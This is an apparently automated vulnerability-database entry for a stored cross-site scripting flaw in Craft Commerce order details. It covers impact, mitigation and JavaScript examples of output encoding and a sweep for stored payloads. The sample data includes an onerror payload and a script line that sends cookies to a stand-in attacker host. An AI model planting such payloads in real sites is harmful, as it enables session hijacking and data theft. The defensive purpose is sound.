CVE-2026-29177: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in craftcms commerce
CVE-2026-29177 is a stored Cross-Site Scripting (XSS) vulnerability in Craft Commerce versions prior to 4.10.2 and 5.5.3. The flaw allows malicious JavaScript injection via user-controllable fields such as Shipping Method Name, Order Reference, or Site Name. The payload executes when a user views the order details slideout by double-clicking an order on the index page. Exploitation requires an account with low privileges (PR:L) and user interaction by the victim (UI:A); the CVSS 4.0 "Attack Requirements: None" metric (AT:N) means no special deployment conditions are needed, not that the attack is unauthenticated. The vulnerability has a low CVSS score of 1.9 and no known exploits in the wild.
AI Analysis
Technical Summary
CVE-2026-29177 is a stored Cross-Site Scripting (XSS) vulnerability classified under CWE-79 affecting Craft Commerce, the ecommerce plugin for Craft CMS. The vulnerability exists in versions >=4.0.0 and <4.10.2, and >=5.0.0 and <5.5.3. It arises from improper neutralization of input during web page generation, specifically in the order details interface. An attacker who can set values such as the Shipping Method Name, Order Reference, or Site Name can store a JavaScript payload in them. When a user double-clicks an order on the order index page to open the order details slideout, the stored value is rendered without adequate encoding and the injected script executes in that user's browser, with that user's control panel session. This can lead to session hijacking, defacement, or other client-side attacks. The CVSS 4.0 vector indicates network attack vector (AV:N), low attack complexity (AC:L), no special attack requirements (AT:N), low privileges required (PR:L), and user interaction required (UI:A), with limited impact on the integrity of the vulnerable system (VI:L) and no impact on availability or on subsequent systems. No known exploits have been reported in the wild. The issue was addressed in Craft Commerce versions 4.10.2 and 5.5.3 by properly encoding user-controllable values before rendering them in the order details UI.
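The rendering mistake behind this class of bug, and the output-encoding fix, as an added illustration in JavaScript. This is not Craft Commerce's own code: the record shape, the field names (shippingMethodName, reference, siteName) and the render helpers are assumptions made for the example, and the order record is constructed.

```javascript
// Added example, not Craft Commerce code. Field names and helpers are
// assumptions chosen to mirror the fields named in the advisory.

// Constructed order record. The shipping method name carries a payload that
// a low-privileged account could have stored ahead of time.
const sampleOrder = {
  reference: 'ORD-1001',
  siteName: 'Default',
  shippingMethodName: 'Express<img src=x onerror="alert(document.cookie)">',
};

// Minimal HTML entity encoder, safe for text nodes and quoted attributes.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Vulnerable pattern: stored data is concatenated straight into markup that
// is later assigned to innerHTML when the slideout opens.
function renderOrderDetailsUnsafe(order) {
  return `<div class="order-details">
  <h2>${order.reference}</h2>
  <dl>
    <dt>Site</dt><dd>${order.siteName}</dd>
    <dt>Shipping method</dt><dd>${order.shippingMethodName}</dd>
  </dl>
</div>`;
}

// Hardened pattern: every user-controllable value is encoded for the HTML
// context it lands in, so the payload is displayed as text, not parsed.
function renderOrderDetailsSafe(order) {
  return `<div class="order-details">
  <h2>${escapeHtml(order.reference)}</h2>
  <dl>
    <dt>Site</dt><dd>${escapeHtml(order.siteName)}</dd>
    <dt>Shipping method</dt><dd>${escapeHtml(order.shippingMethodName)}</dd>
  </dl>
</div>`;
}

// Check whether the rendered markup still contains a live <img onerror=...> tag.
function containsLiveTag(html) {
  return /<img\b[^>]*onerror=/i.test(html);
}

console.log('unsafe render executes payload:', containsLiveTag(renderOrderDetailsUnsafe(sampleOrder)));
console.log('safe render executes payload:  ', containsLiveTag(renderOrderDetailsSafe(sampleOrder)));
```

In real control-panel code the equivalent fix is to build the slideout with DOM APIs (`element.textContent = value`) or a template engine with autoescaping enabled, rather than string concatenation into `innerHTML`; the encoder above is only there to make the difference between the two render paths visible.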
Potential Impact
The primary impact of this vulnerability is the potential execution of arbitrary JavaScript in the browsers of users viewing order details, which could lead to session hijacking, theft of sensitive information, or unauthorized actions performed on behalf of the user. Although the CVSS score is low, the risk increases in environments where users with elevated privileges (e.g., administrators or customer service agents) access order details, as their sessions could be compromised. This could lead to further compromise of the ecommerce platform or customer data. The vulnerability could also be leveraged for phishing or social engineering attacks by injecting misleading content. However, exploitation requires user interaction and some level of privilege, limiting the scope of impact. Organizations running affected versions of Craft Commerce risk reputational damage and potential data breaches if the vulnerability is exploited.
Mitigation Recommendations
Organizations should upgrade Craft Commerce to version 4.10.2 or 5.5.3 (or later), where the vulnerability is patched. Until the upgrade is applied, restrict which accounts can edit the injection points named in the advisory (shipping method names, order references and site settings) and which accounts can open the order details slideout, and monitor for suspicious activity. A Content Security Policy (CSP) that limits script execution to trusted sources can reduce the impact of an injected payload. Output encoding should be reviewed in custom plugins, templates or integrations that render order data; in Twig templates this means checking for unnecessary use of the raw filter, which disables autoescaping. After patching, sweep existing shipping method names, order references and site names for stored markup, since a payload saved before the upgrade remains in the database even if it no longer executes. Regular security audits and penetration testing focused on user input handling in ecommerce workflows are recommended.
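A triage sweep over stored order data, as an added JavaScript example that is not part of Craft Commerce or this advisory. It flags values in the fields named above that carry markup or script that should never appear in a shipping method name, order reference or site name. The record shape, field names and sample orders are constructed for the example; a real sweep would read the rows from the commerce database or Craft's element API.

```javascript
// Added example, not Craft Commerce code. Record shape and field names are
// assumptions chosen to mirror the fields named in the advisory.

// Heuristic patterns for injected markup. The handler list is deliberately
// explicit so that ordinary words such as "online =" are not flagged; an
// attacker can choose a rarer handler, so treat a clean result as triage,
// not proof.
const suspiciousPatterns = [
  /<\s*script\b/i,
  /<\s*(img|svg|iframe|object|embed|math|style|link)\b/i,
  /[\s"'\/]on(error|load|click|mouseover|focus|blur|input|toggle|animationstart)\s*=/i,
  /javascript\s*:/i,
];

// Fields a practitioner would want to check for this CVE.
const sweepFields = ['shippingMethodName', 'reference', 'siteName'];

// Returns one finding per (order, field) whose value matches a pattern.
function findSuspiciousValues(orders) {
  const findings = [];
  for (const order of orders) {
    for (const field of sweepFields) {
      const value = order[field];
      if (typeof value !== 'string') continue;
      const matched = suspiciousPatterns.find((re) => re.test(value));
      if (matched) {
        findings.push({ id: order.id, field, value, pattern: String(matched) });
      }
    }
  }
  return findings;
}

// Constructed sample rows: two benign, two carrying stored payloads. Row 4
// contains "&" and "<" that are legitimate text and must not be flagged.
const sampleOrders = [
  { id: 1, reference: 'ORD-1001', siteName: 'Default', shippingMethodName: 'Standard' },
  { id: 2, reference: 'ORD-1002', siteName: 'Default', shippingMethodName: 'Express<img src=x onerror=alert(1)>' },
  { id: 3, reference: '"><script>fetch("https://attacker.example/?c=" + document.cookie)</script>', siteName: 'Default', shippingMethodName: 'Standard' },
  { id: 4, reference: 'ORD-1004', siteName: 'Tom & Jerry <3', shippingMethodName: 'Standard' },
];

for (const f of findSuspiciousValues(sampleOrders)) {
  console.log(`order ${f.id}: field ${f.field} matched ${f.pattern}`);
}
```

A finding from a sweep like this is evidence that someone already exercised the injection point, so it should trigger a review of which account last saved that value, not just a cleanup of the field.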
Affected Countries
United States, Germany, United Kingdom, Canada, Australia, Netherlands, France, Japan, Sweden, Switzerland
Technical Details
- Data Version: 5.2
- Assigner Short Name: GitHub_M
- Date Reserved: 2026-03-04T14:44:00.713Z
- CVSS Version: 4.0
- State: PUBLISHED
Threat ID: 69b07bba2f860ef943b24cd7
Added to database: 3/10/2026, 8:14:50 PM
Last enriched: 3/10/2026, 8:30:11 PM
Last updated: 3/10/2026, 9:35:24 PM